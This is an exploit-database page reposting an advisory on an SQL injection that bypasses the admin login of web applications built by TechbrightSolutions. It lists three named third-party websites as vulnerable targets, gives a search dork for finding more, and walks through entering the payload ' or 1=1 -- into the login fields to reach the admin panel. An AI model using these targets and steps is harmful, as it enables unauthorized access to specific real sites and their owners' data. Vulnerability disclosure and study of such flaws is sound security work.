Advertisement






Techbrightsolutions - Sql Injection/Admin Panel Bypass

CVE Category Price Severity
N/A CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2024-02-02
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020010

Below is a copy:

Techbrightsolutions - Sql Injection/Admin Panel Bypass
TITLE: Techbrightsolutions - Sql Injection/Admin Panel Bypass
# Exploit Author: Onur Kara (root9ext)
# Service Provider: TechbrightSolutions
# Vulnerable URL: /Admin/login.aspx
# Dork: "by TechbrightSolutions" "login"
# Vulnerability Type: SQL Bypass
# Severity: Critical

Vulnerability Description:
During a recent penetration test conducted by TechbrightSolutions, a critical SQL injection vulnerability was discovered in the Admin Panel login functionality of TechbrightSolutions' application's code. The vulnerability allows an attacker to bypass authentication controls and execute arbitrary SQL queries, potentially leading to unauthorized access and data compromise.

Proof of Concept (PoC):
URLs:
- http://kolencheryfamilytrust.org/Admin/login.aspx
- http://vivacards.in/Admin/AdminLogin.aspx
- https://globaljobs24.com/AdminLogin.aspx

1. Visit the admin login page, typically located at: http://kolencheryfamilytrust.org/Admin/login.aspx
2. Input the following payload in the username and password fields:
' or 1=1 --
' or 1=1 --
3. Submit the form.
4. Observe that the admin panel is accessible without redirection, indicating successful authentication bypass.
# Disclaimer: This PoC is for educational purposes only. Unauthorized access to systems or applications is illegal.

Contact
Telegram: @rootninext

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.